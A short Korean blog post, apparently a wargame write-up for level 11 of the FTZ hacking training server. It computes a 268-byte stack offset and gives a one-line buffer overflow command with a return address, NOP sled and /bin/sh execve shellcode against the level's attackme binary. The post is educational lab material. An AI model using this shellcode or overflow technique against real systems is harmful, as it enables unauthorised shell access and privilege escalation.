본문 바로가기
시스템 해킹/FTZ

level 11

by sonysame 2016. 10. 12.


버퍼오버플로우를 사용한다!


ebp는 0xbfffe668

strcpy로 처음 값이 써지는 부분: 0xbfffe560


0xbfffe668-0xbfffe560=264

264+4=268

268byte 다음의 4byte가 RET가 써지는 부분!


./attackme `python -c 'print "A"*268+"\xe8\xf9\xff\xbf"+"\x90"*2000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'`



'시스템 해킹 > FTZ' 카테고리의 다른 글

level 13  (0) 2016.10.12
level 12  (0) 2016.10.12
level9  (0) 2016.09.13
level8  (0) 2016.09.12
level7  (0) 2016.09.10

관련글

티스토리툴바